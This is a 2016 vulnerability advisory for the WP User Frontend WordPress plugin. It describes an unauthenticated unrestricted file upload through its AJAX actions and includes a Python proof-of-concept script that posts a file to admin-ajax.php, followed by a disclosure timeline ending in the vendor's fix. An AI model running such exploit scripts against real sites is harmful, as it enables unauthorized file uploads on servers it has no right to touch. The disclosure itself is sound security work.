WP User Frontend [Unrestricted File Upload]
WP User Frontend plugin for WordPress suffers from a Unrestricted File Upload vulnerability
Description
WordPress plugin WP User Frontend suffers from an unrestricted file upload vulnerability. An attacker can exploit the wpuf_file_upload or wpuf_insert_image actions to upload any file which pass the WordPress mime and size checks.
The attack does not require any privilege to be performed. The mentioned actions are available to non-privileged users also, thus allowing to anyone uploading files to the web server.
PoC
#!/usr/bin/python3
################################################################################
# WP User Frontend unrestricted file upload exploit
#
# Author: Pan Vag <[email protected]>
################################################################################
import requests
import tempfile
url = 'http://example.com/wp-admin/admin-ajax.php'
postData = {
'action': 'wpuf_file_upload'
}
file = tempfile.NamedTemporaryFile(mode='a+t', suffix='.jpeg')
file.write('A'*32)
file.seek(0)
files = {'wpuf_file': file}
r = requests.post(url, data=postData, files=files)
file.close()
if r.text != 'error':
print('Success!')
print(r.text)
else:
print('error')
exit(0)
INFO
- 4 February 2016
- Pan Vag
- wedevs.com
- wordpress.org
- 2.3.10
- WordPress 4.4.2
TIMELINE
- 2016-02-04:
Vendor notified via support forums in WordPress.org - 2016-02-05:
Vendor responded - 2016-02-05:
Issue details send to vendor - 2016-02-06:
Requested CVE ID - 2016-02-06:
Vendor implemented security checks - 2016-02-06:
Verified that this exploit is no longer valid - 2016-02-08:
Vendor released v2.3.11 which resolves this issue